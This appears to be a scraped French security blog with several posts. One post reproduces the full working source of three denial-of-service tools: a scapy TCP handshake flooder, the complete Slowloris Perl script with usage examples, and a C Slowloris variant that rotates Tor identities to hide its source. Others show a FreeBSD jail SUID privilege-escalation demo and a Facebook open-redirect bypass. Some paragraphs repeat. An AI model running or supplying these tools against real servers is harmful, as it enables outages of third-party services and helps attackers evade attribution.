Comme vous l'avez constaté, j'utilise Nanoblogger pour publier. C'est assez geek mais
j'aime bien. En ajoutant un article aujourd'hui,
j'ai constaté l'erreur suivante qui s'affichait
fréquemment, surtout pour la génération des RSS.
Objectif corriger cela.
Nanoblogger sous FreeBSD utilise la commande nb. On constate en ouvrant ce fichier (un script bash) le lien d'installation :
cal: illegal option -- h
usage: cal [-jy] [[month] year]
cal [-j] [-m month] [year]
ncal [-Jjpwy] [-s country_code] [[month] year]
ncal [-Jeo] [year]
On voit qu'il utilise un argument -h qui n'existe pas quand on fait un
man cal. Objectif corriger cela.
Nanoblogger sous FreeBSD utilise la commande nb. On constate en ouvrant ce fichier (un script bash) le lien d'installation :
# where to expect nanoblogger's base NB_BASE_DIR="/usr/local/share/nanoblogger"On va donc aller dans ce répertoire et rechercher la commande cal avec un méchant grep
[root@serv /usr/local/share/nanoblogger]# grep -R cal * ... plugins/calendar.sh:[ ! -z "$DATE_LOCALE" ] && CALENDAR=`LC_ALL="$DATE_LOCALE" $CAL_CMD $CAL_ARGS "$cal_month" "$cal_year"` ...On observe donc un $CAL_CMD et un $CAL_ARGS. Comme on a une erreur d'argument sur un soi-disant -h, on va chercher cette variable.
[root@serv /usr/local/share/nanoblogger]# grep -R CAL_ARGS *
plugins/calendar.sh:: ${CAL_ARGS:=-h}
Bingo ! On modifie donc ce fichier en ne mettant aucune option à
la place de -h et on update notre blog.
plugins/calendar.sh:: ${CAL_ARGS:=}
Ca marche :)
12-07-2011 00:13:59
[Secu] DoS type Slowloris via TOR
J'ai récemment vu un post qui m'a intéressé sur
Fulldisclosure parlant du soi-disant leak de l'outils de the j3st3r, XerXes.
Le code de cet outils est recherché par certain car semble offrir
de forte capacité de DoS. Meme si au final, ce n'est pas ce code,
il est
intéressant et présente une évolution de Slowloris.
J'avais publié avant la publication de Slowloris un outils fonctionnant dans le meme esprit mais au final impactant plus d'applications car non focalisé sur les serveurs web. Je vais donc expliqué le fonctionnement du nouveau code publié et comparer les 3 outils.
Pour ce qui est de mon code que j'avais nommé "Tcp handshake flood", il réalise des TCP handshake avec le serveur cible sans enregistrer les sessions pour rester performant. Basé sur scapy, il envoie des SYN, lance un 2e thread qui sniff et répond aux SYN/ACK pour établir une connexion et rester en attente ce qui surcharge le serveur distant. Du coup il fonctionne très bien sur les serveurs Apache mais également sur d'autres serveurs comme SSH. Il n'envoie aucun payload comme le fait slowloris et reste donc plus "ouvert". Code de TCP Handshake Flood :
Slowloris est écrit en perl et crée de nombreux thread se connectant à un serveur web avec un payload puis ne fait plus rien pour laisser la socket ouverte et surcharger le serveur. Il est très efficace sur les serveurs web mais par exemple ne fait rien sur un serveur SSH si on ne modifie pas un peu le code. Par ailleurs il ne permet également pas de spoofer l'adresse source. Code de Slowloris :
J'avais publié avant la publication de Slowloris un outils fonctionnant dans le meme esprit mais au final impactant plus d'applications car non focalisé sur les serveurs web. Je vais donc expliqué le fonctionnement du nouveau code publié et comparer les 3 outils.
Pour ce qui est de mon code que j'avais nommé "Tcp handshake flood", il réalise des TCP handshake avec le serveur cible sans enregistrer les sessions pour rester performant. Basé sur scapy, il envoie des SYN, lance un 2e thread qui sniff et répond aux SYN/ACK pour établir une connexion et rester en attente ce qui surcharge le serveur distant. Du coup il fonctionne très bien sur les serveurs Apache mais également sur d'autres serveurs comme SSH. Il n'envoie aucun payload comme le fait slowloris et reste donc plus "ouvert". Code de TCP Handshake Flood :
#!/usr/bin/env python
from scapy.all import *
import threading, sys
import pprint
try:
print "TCP/IP DoS HandShake Flood PoC by cloud :
http://blog.madpowah.org"
hostname = sys.argv[1]
dport = sys.argv[2]
nbsyn = int(sys.argv[3])
network = sys.argv[4]
except:
print "Utilisation: ./handshake.py "
print "Exemple: ./handshake.py 192.168.0.1 80 65000 eth0"
sys.exit(1)
def sendSyns():
print ">> Sending SYN ..."
sport = 6000
while sport < 6000 + nbsyn:
send(IP(dst=hostname,ttl=255)/ TCP(flags="S",
sport=sport,dport=int(dport), seq=sport), verbose=0)
sport += 1
def startSniff():
print ">> Start sniff ..."
nbcount = nbsyn*10
filterport = "port " + dport
sniff(iface=network,filter=filterport, prn=lambda x: getNumSeq(x),
count=nbcount)
def getNumSeq(packet):
if packet.getlayer('TCP') is not None:
flag = packet.getlayer('TCP').flags
if flag == 18:
numseq = packet.getlayer('TCP').ack
numack = packet.getlayer('TCP').seq + 1
srcport = packet.getlayer('TCP').dport
send(IP(dst=hostname,ttl=255) / TCP(flags="A",
sport=srcport, dport=int(dport), seq=numseq, ack=numack), verbose=0)
print "ACK %d" % (numseq)
t1 = threading.Thread(target = startSniff, args = ())
t2 = threading.Thread(target = sendSyns, args = ())
t1.start()
t2.start()
Le gros inconvénient est qu'il ne permet pas dans l'état
de spoofer une adresse et on est donc fortement susceptible d'etre
identifié
et l'ip source peut facilement etre bloquée. Par ailleurs, il
necessite de bloquer tous les paquets de type RST avant le lancement du
script
iptables -A OUTPUT -o eth0 -p tcp --tcp-flags RST RST -j DROP
Slowloris est écrit en perl et crée de nombreux thread se connectant à un serveur web avec un payload puis ne fait plus rien pour laisser la socket ouverte et surcharger le serveur. Il est très efficace sur les serveurs web mais par exemple ne fait rien sur un serveur SSH si on ne modifie pas un peu le code. Par ailleurs il ne permet également pas de spoofer l'adresse source. Code de Slowloris :
#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
print <<EOTEXT;
CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc.....
....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c. .
.coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888\@8\@88888888Oo:. . ...cO888Oc..
:oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888\@88888888888Oo:. .O8888C: .oCOo.
...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo: :.
.:..ccoCCCooCooccooccccoooooCCCC
coooCCO8\@88OO8O888Oo:::... .. :cO8Oc. . ..... :.
.:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::.. ....
..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:...
....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::.......
...:::cccc:cooo
..... ............. .coocoooCCoco:::ccccccc:::ccc::..........
....:::cc::::coC
. . ... .... .. .:cccoCooc:.. ::cccc:::c:.. .........
......::::c:cccco
. .. ... .. .. .. ..:...:cooc::cccccc:..... .........
.....:::::ccoocc
. . .. ..::cccc:.::ccoocc:. ........... .. .
..:::.:::::::ccco
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP
client
EOTEXT
my ( $host, $port, $sendhost, $shost, $test, $version, $timeout,
$connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
'shost=s' => \$shost,
'dns=s' => \$host,
'httpready' => \$httpready,
'num=i' => \$connections,
'cache' => \$cache,
'port=i' => \$port,
'https' => \$ssl,
'tcpto=i' => \$tcpto,
'test' => \$test,
'timeout=i' => \$timeout,
'version' => \$version,
);
if ($version) {
print "Version 0.7\n";
exit;
}
unless ($host) {
print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
print "\n\tType 'perldoc $0' for help with options.\n\n";
exit;
}
unless ($port) {
$port = 80;
print "Defaulting to port 80.\n";
}
unless ($tcpto) {
$tcpto = 5;
print "Defaulting to a 5 second tcp connection timeout.\n";
}
unless ($test) {
unless ($timeout) {
$timeout = 100;
print "Defaulting to a 100 second re-try timeout.\n";
}
unless ($connections) {
$connections = 1000;
print "Defaulting to 1000 connections.\n";
}
}
my $usemultithreading = 0;
if ( $Config{usethreads} ) {
print "Multithreading enabled.\n";
$usemultithreading = 1;
use threads;
use threads::shared;
}
else {
print "No multithreading capabilites found!\n";
print "Slowloris will be slower than normal as a result.\n";
}
my $packetcount : shared = 0;
my $failed : shared = 0;
my $connectioncount : shared = 0;
srand() if ($cache);
if ($shost) {
$sendhost = $shost;
}
else {
$sendhost = $host;
}
if ($httpready) {
$method = "POST";
}
else {
$method = "GET";
}
if ($test) {
my @times = ( "2", "30", "90", "240", "500" );
my $totaltime = 0;
foreach (@times) {
$totaltime = $totaltime + $_;
}
$totaltime = $totaltime / 60;
print "This test could take up to $totaltime minutes.\n";
my $delay = 0;
my $working = 0;
my $sock;
if ($ssl) {
if (
$sock = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
else {
if (
$sock = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
if ($working) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"GET /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT
5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR
3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
if ( print $sock $primarypayload ) {
print "Connection successful, now comes the waiting
game...\n";
}
else {
print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
}
else {
print "Uhm... I can't connect to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
for ( my $i = 0 ; $i <= $#times ; $i++ ) {
print "Trying a $times[$i] second delay: \n";
sleep( $times[$i] );
if ( print $sock "X-a: b\r\n" ) {
print "\tWorked.\n";
$delay = $times[$i];
}
else {
if ( $SIG{__WARN__} ) {
$delay = $times[ $i - 1 ];
last;
}
print "\tFailed after $times[$i] seconds.\n";
}
}
if ( print $sock "Connection: Close\r\n\r\n" ) {
print "Okay that's enough time. Slowloris closed the socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
else {
print "Remote server closed socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
if ( $delay < 166 ) {
print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it
generally
takes between 200-500 threads for most servers and assuming any latency
at
all... you might have trouble using Slowloris against this target. You
can
tweak the -timeout flag down to less than 10 seconds but it still may
not
build the sockets in time.
EOSUCKS2BU
}
}
else {
print
"Connecting to $host:$port every $timeout seconds with $connections
sockets:\n";
if ($usemultithreading) {
domultithreading($connections);
}
else {
doconnections( $connections, $usemultithreading );
}
}
sub doconnections {
my ( $num, $usemultithreading ) = @_;
my ( @first, @sock, @working );
my $failedconnections = 0;
$working[$_] = 0 foreach ( 1 .. $num ); #initializing
$first[$_] = 0 foreach ( 1 .. $num ); #initializing
while (1) {
$failedconnections = 0;
print "\t\tBuilding sockets.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 0 ) {
if ($ssl) {
if (
$sock[$z] = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
}
else {
$working[$z] = 0;
}
}
else {
if (
$sock[$z] = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
$packetcount = $packetcount + 3; #SYN, SYN+ACK,
ACK
}
else {
$working[$z] = 0;
}
}
if ( $working[$z] == 1 ) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"$method /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET
CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
my $handle = $sock[$z];
if ($handle) {
print $handle "$primarypayload";
if ( $SIG{__WARN__} ) {
$working[$z] = 0;
close $handle;
$failed++;
$failedconnections++;
}
else {
$packetcount++;
$working[$z] = 1;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
}
print "\t\tSending data.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 1 ) {
if ( $sock[$z] ) {
my $handle = $sock[$z];
if ( print $handle "X-a: b\r\n" ) {
$working[$z] = 1;
$packetcount++;
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
}
print
"Current stats:\tSlowloris has now sent $packetcount packets
successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
sleep($timeout);
}
}
sub domultithreading {
my ($num) = @_;
my @thrs;
my $i = 0;
my $connectionsperthread = 50;
while ( $i < $num ) {
$thrs[$i] =
threads->create( \&doconnections, $connectionsperthread, 1
);
$i += $connectionsperthread;
}
my @threadslist = threads->list();
while ( $#threadslist > 0 ) {
$failed = 0;
}
}
__END__
=head1 TITLE
Slowloris
=head1 VERSION
Version 0.7 Beta
=head1 DATE
06/17/2009
=head1 AUTHOR
RSnake <h@ckers.org> with threading from John Kinsella
=head1 ABSTRACT
Slowloris both helps identify the timeout windows of a HTTP server or
Proxy server, can bypass httpready protection and ultimately performs a
fairly low bandwidth denial of service. It has the added benefit of
allowing the server to come back at any time (once the program is
killed), and not spamming the logs excessively. It also keeps the load
nice and low on the target server, so other vital processes don't die
unexpectedly, or cause alarm to anyone who is logged into the server for
other reasons.
=head1 AFFECTS
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?
=head1 NOT AFFECTED
IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?
=head1 DESCRIPTION
Slowloris is designed so that a single machine (probably a Linux/UNIX
machine since Windows appears to limit how many sockets you can have
open at any given time) can easily tie up a typical web server or proxy
server by locking up all of it's threads as they patiently wait for more
data. Some servers may have a smaller tolerance for timeouts than
others, but Slowloris can compensate for that by customizing the
timeouts. There is an added function to help you get started with
finding the right sized timeouts as well.
As a side note, Slowloris does not consume a lot of resources so modern
operating systems don't have a need to start shutting down sockets when
they come under attack, which actually in turn makes Slowloris better
than a typical flooder in certain circumstances. Think of Slowloris as
the HTTP equivalent of a SYN flood.
=head2 Testing
If the timeouts are completely unknown, Slowloris comes with a mode to
help you get started in your testing:
=head3 Testing Example:
./slowloris.pl -dns www.example.com -port 80 -test
This won't give you a perfect number, but it should give you a pretty
good guess as to where to shoot for. If you really must know the exact
number, you may want to mess with the @times array (although I wouldn't
suggest that unless you know what you're doing).
=head2 HTTP DoS
Once you find a timeout window, you can tune Slowloris to use certain
timeout windows. For instance, if you know that the server has a
timeout of 3000 seconds, but the the connection is fairly latent you may
want to make the timeout window 2000 seconds and increase the TCP
timeout to 5 seconds. The following example uses 500 sockets. Most
average Apache servers, for instance, tend to fall down between 400-600
sockets with a default configuration. Some are less than 300. The
smaller the timeout the faster you will consume all the available
resources as other sockets that are in use become available - this would
be solved by threading, but that's for a future revision. The closer
you can get to the exact number of sockets, the better, because that
will reduce the amount of tries (and associated bandwidth) that
Slowloris will make to be successful. Slowloris has no way to identify
if it's successful or not though.
=head3 HTTP DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500
-tcpto 5
=head2 HTTPReady Bypass
HTTPReady only follows certain rules so with a switch Slowloris can
bypass HTTPReady by sending the attack as a POST verses a GET or HEAD
request with the -httpready switch.
=head3 HTTPReady Bypass Example
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500
-tcpto 5 -httpready
=head2 Stealth Host DoS
If you know the server has multiple webservers running on it in virtual
hosts, you can send the attack to a seperate virtual host using the
-shost variable. This way the logs that are created will go to a
different virtual host log file, but only if they are kept separately.
=head3 Stealth Host DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto
1 -shost www.virtualhost.com
=head2 HTTPS DoS
Slowloris does support SSL/TLS on an experimental basis with the -https
switch. The usefulness of this particular option has not been
thoroughly tested, and in fact has not proved to be particularly
effective in the very few tests I performed during the early phases of
development. Your mileage may vary.
=head3 HTTPS DoS Example:
./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500
-https
=head2 HTTP Cache
Slowloris does support cache avoidance on an experimental basis with the
-cache switch. Some caching servers may look at the request path part
of the header, but by sending different requests each time you can abuse
more resources. The usefulness of this particular option has not been
thoroughly tested. Your mileage may vary.
=head3 HTTP Cache Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
=head1 Issues
Slowloris is known to not work on several servers found in the NOT
AFFECTED section above and through Netscalar devices, in it's current
incarnation. They may be ways around this, but not in this version at
this time. Most likely most anti-DDoS and load balancers won't be
thwarted by Slowloris, unless Slowloris is extremely distrubted,
although only Netscalar has been tested.
Slowloris isn't completely quiet either, because it can't be. Firstly,
it does send out quite a few packets (although far far less than a
typical GET request flooder). So it's not invisible if the traffic to
the site is typically fairly low. On higher traffic sites it will
unlikely that it is noticed in the log files - although you may have
trouble taking down a larger site with just one machine, depending on
their architecture.
For some reason Slowloris works way better if run from a *Nix box than
from Windows. I would guess that it's probably to do with the fact that
Windows limits the amount of open sockets you can have at once to a
fairly small number. If you find that you can't open any more ports
than ~130 or so on any server you test - you're probably running into
this "feature" of modern operating systems. Either way, this program
seems to work best if run from FreeBSD.
Once you stop the DoS all the sockets will naturally close with a flurry
of RST and FIN packets, at which time the web server or proxy server
will write to it's logs with a lot of 400 (Bad Request) errors. So
while the sockets remain open, you won't be in the logs, but once the
sockets close you'll have quite a few entries all lined up next to one
another. You will probably be easy to find if anyone is looking at
their logs at that point - although the DoS will be over by that point
too.
=head1 What is a slow loris?
What exactly is a slow loris? It's an extremely cute but endangered
mammal that happens to also be poisonous. Check this out:
http://www.youtube.com/watch?v=rLdQ3UhLoD4
SanguineRose /
William Welna a donc eu l'idée de partir sur une attaque de
type Slowloris mais en envoyant un payload générique
(0x00)
et en utilisant des tunnels TOR qu'il va changer durant l'attaque. Ainsi
l'adresse source est spoofée et en plus change plusieurs fois
durant l'attaque
ce qui simule presque un DDoS avec une seule machine. Par ailleurs il
reste assez générique comme Tcp Handshake Flood et permet
d'etre efficace sur
un serveur autre que web. Par contre il est beaucoup moins efficace que
slowloris sur du web, cela dépend probablement du chemin du
tunnel TOR qui
sera emprunté. De plus on constate en sniffant le traffic que les
ip source varient mais peu, c'est à dire environ toutes les
15-20s ce qui
est trop faible pour simuler vraiment un DDoS. Il est par contre
également efficace contre un serveur SSH très rapidement.
Code de Slowloris with a twist over tor :
/* =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
* Slowloris with a twist over tor
* =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*
* Due to the alpha version of this code being leaked I've decided
* to release an improved version to fully show this method of
* attack mostly free of the bugs / dependency on torsocks. This
* attack works on a similar idea of slowloris only it sends packets
* containing a single 0x00 and optionally nothing causing Apache
* to keep the connection alive almost indefinitely.
*
* Due to no one knowing how th3j35t3r's XerXes works I can not say
* if this is the same method. This was one of my many ideas I was
* exploring as to how it could possibly work that has some successful
* results.
*
* - SanguineRose / William Welna
*
* Leaked Version
* http://seclists.org/fulldisclosure/2011/Jul/84
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <pthread.h>
/* Re-connecting to tor sometimes takes a while, in order for this to be
effective it requires
* mass amounts of threads handling only a few connections each, since
this is a POC I will leave
* it up to others to fix that. It also has limited success/attack
lengths due to tor being slow
*/
#define CONNECTIONS 3
#define THREADS 148
typedef struct {
const char *host, *port;
} thread_args;
// Simple debug function
void dump_array(char *name, char *data, int size) {
int x, z, indent = strlen(name) + 2;
fprintf(stderr, "%s { ", name);
for(x=0; x < size; x++) {
for(z=0; z < indent; z++)
putc(0x20, stderr);
fprintf(stderr, "%20x\n", data[x]);
}
fprintf(stderr, "};\n");
}
int make_socket(const char *host, const char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r, y=1;
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
return -1;
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype,
p->ai_protocol)) == -1) {
continue;
}
setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &y, 4);
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
return -2;
}
if(servinfo)
freeaddrinfo(servinfo);
return sock;
}
/* Opens SOCKS5 connection to tor
* I also dedicate this function to pr0f <3
*/
int pr0f_loves_me_tor_connect(const char *host, const char *port) {
char *buf = calloc(1024, sizeof(char));
short l = strlen(host), t;
int x, sock;
fprintf(stderr, "[Connect %s:%s]\n", host, port);
if((sock=make_socket("127.0.0.1", "9050"))<0) {
free(buf);
return sock;
}
write(sock, "\x05\x01\x00", 3); // SOCKS5, 1 Authentication
Method, No Auth/Plain
read(sock, buf, 1024);
if((buf[0] != 0x05) || (buf[1] == 0xFF) || (buf[1] != 0x00)) {
free(buf);
return -3; // Auth not accepted by socks server / wrong
version
}
buf[0] = 0x05; buf[1] = 0x01; buf[2] = 0x00; buf[3] = 0x03;
buf[4] = l;
for(x=0; x < l; x++)
buf[5+x] = host[x];
x=l+5;
t = htons(atoi(port));
memcpy((buf+x), &t, 2);
//dump_array("final_request", buf, x+2);
write(sock, buf, x+2);// send request
read(sock, buf, 1024);
if((buf[0] == 0x05) && (buf[1] == 0x00)) { // connection
granted/success
free(buf);
return sock;
}
free(buf);
return -4; // Unable to conect
}
// This is for the SIGPIPE error on bad connections / premature closing
void broke(int s) {
// do nothing
}
void *attack(void *arg) {
thread_args *a = (thread_args *)arg;
int x, r, socks[CONNECTIONS];
fprintf(stderr, "[Thread Started]\n");
for(x=0; x < CONNECTIONS; x++)
socks[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x < CONNECTIONS; x++) {
if(socks[x] <= 0) {
socks[x] =
pr0f_loves_me_tor_connect(a->host, a->port);
fprintf(stderr, "[Socket Returned
%i]\n", socks[x]);
}
if(write(socks[x], "\0", 1) < 0) {
close(socks[x]);
fprintf(stderr, "[Socket Error Returned
%i]\n", socks[x]);
socks[x] =
pr0f_loves_me_tor_connect(a->host, a->port);
}
}
usleep(100000);
}
}
void do_help(char *n) {
fprintf(stderr, "Usage: %s <ip/hostname> <port>\n");
exit(0);
}
void *cycle_identity() {
int sock = make_socket("localhost", "9051");
char *shit_bucket = calloc(1024, sizeof(char));
if(sock < 0) {
fprintf(stderr, "Can't connect to tor control port\n");
free(shit_bucket);
pthread_exit(NULL);
}
write(sock, "AUTHENTICATE \"\"\n", 16);
while(1) {
write(sock, "signal NEWNYM\n", 15);
fprintf(stderr, "[cycle_identity -> signal
NEWNYM\n");
read(sock, shit_bucket, 1024);
sleep(5);
}
}
int main(int argc, char **argv) {
pthread_t threads[THREADS];
pthread_t cycle_tid;
thread_args arg;
void *status;
int x;
if(argc != 3)
do_help(argv[0]);
arg.host = (const char *)argv[1];
arg.port = (const char *)argv[2];
pthread_create(&cycle_tid, NULL, cycle_identity, NULL);
for(x=0; x < THREADS; x++) {
pthread_create(&threads[x], NULL, attack, &arg);
usleep(200000);
}
for(x=0; x < THREADS; x++)
pthread_join(threads[x], &status);
pthread_kill(cycle_tid, 15);
pthread_exit(NULL);
return 0;
}
Il n'existe donc pas encore d'attaque de type DoS parfaite mais le choix
de l'outil dépend de l'objectif et du niveau de discrétion
souhaité.
On pourrait également imaginé un cumul des méthodes
pour augmenter l'efficacité et noyer notre IP parmi d'autres. Je
pense que l'ajout
d'une règle de firewall comme je l'avais
indiqué dans mon précédent article devrait
toujours empecher toutes ces attaques d'aboutir.
10-05-2011 00:10:55
[FreeBSD] Privilege Escalation using Jails
Une discussion intéressante est en cours sur la mailing security
de freebsd. Ce n'est pas forcément nouveau mais cela est remis au
gout
du jour depuis le post suivant.
Si un utilisateur obtient le root dans une jail FreeBSD et qu'il crée un executable SUID, alors un utilisateur sans privilège peut exécuter ce binaire avec des droits root depuis le host pour ainsi obtenir une élévation de privilège sur le host.
Ex :
Depuis une jail :
Appliqué et approuvé.
Si un utilisateur obtient le root dans une jail FreeBSD et qu'il crée un executable SUID, alors un utilisateur sans privilège peut exécuter ce binaire avec des droits root depuis le host pour ainsi obtenir une élévation de privilège sur le host.
Ex :
Depuis une jail :
[root@jail ~]# cat suid.c
#include <stdio.h>
main(){
system("whoami");
}
[root@jail ~]# gcc -o suid suid.c
[root@jail ~]# chmod +s suid
[root@jail ~]# ls -l suid
-rwsr-sr-x 1 root wheel 8 May 9 23:38 suid
Depuis le host :
[cloud@host /usr/home/cloud]$ /usr/jails/jail/root/suid rootCe problème a déjà été évoqué en 2009 mais sans suite. L'équipe Security FreeBSD a choisi de laisser cela sans correctif technique. En effet une jail n'est pas un système comparable à une machine virtuelle et l'isolement n'a rien à voir. Du coup ce comportement n'est pas choquant et forcer le correctif imposerait une architecture pouvant devenir contraignante. Il a donc été décidé de patcher cela au niveau de la documentation en indiquant qu'un utilisateur non privilégié du host ne doit pas avoir accès aux jails. Voici le patch du manuel.
--- head/usr.sbin/jail/jail.8 Sun May 8 12:16:39 2011 (r221654) +++ head/usr.sbin/jail/jail.8 Sun May 8 12:16:39 2011 (r221655) @@ -34,7 +34,7 @@ .\" .\" $FreeBSD$ .\" -.Dd January 17, 2010 +.Dd May 8, 2011 .Dt JAIL 8 .Os .Sh NAME @@ -431,7 +431,7 @@ command script can be used: .Bd -literal D=/here/is/the/jail cd /usr/src -mkdir -p $D +mkdir -p -m 0700 $D make world DESTDIR=$D make distribution DESTDIR=$D mount -t devfs devfs $D/dev @@ -448,6 +448,10 @@ in the per-jail devfs. A simple devfs ruleset for jails is available as ruleset #4 in .Pa /etc/defaults/devfs.rules . .Pp +Non-superusers in the host system should not be able to access the +jail's files; otherwise an attacker with root access to the jail +could obtain elevated privileges on the host. +.Pp In many cases this example would put far more in the jail than needed. In the other extreme case a jail might contain only one file: the executable to be run in the jail.La recommandation est donc d'avoir ses jails 3 niveaux en dessous de / et de faire un chmod 700 sur les jails (le 2 niveau). En gros il faut avoir ses jails sous la forme /usr/jails/nomdunejail et faire un chmod 700 /usr/jails.
Appliqué et approuvé.
20-03-2011 23:06:22
[Secu] Facebook URL Redirection
Dans l'idée du post précédent sur lequel je
reviendrai pour réévaluer tout ca, je vais vous
présenter une URL redirection applicable
directement sur le site de Facebook. Pour cela il suffit d'appeler 2
fois la variable "u" dans notre requete GET et le controle d'url se
retrouve bypassé et la 2e requete est executé.
Voici un PoC appelant la requete suivante:
Prudence donc à chaque clic !
Voici un PoC appelant la requete suivante:
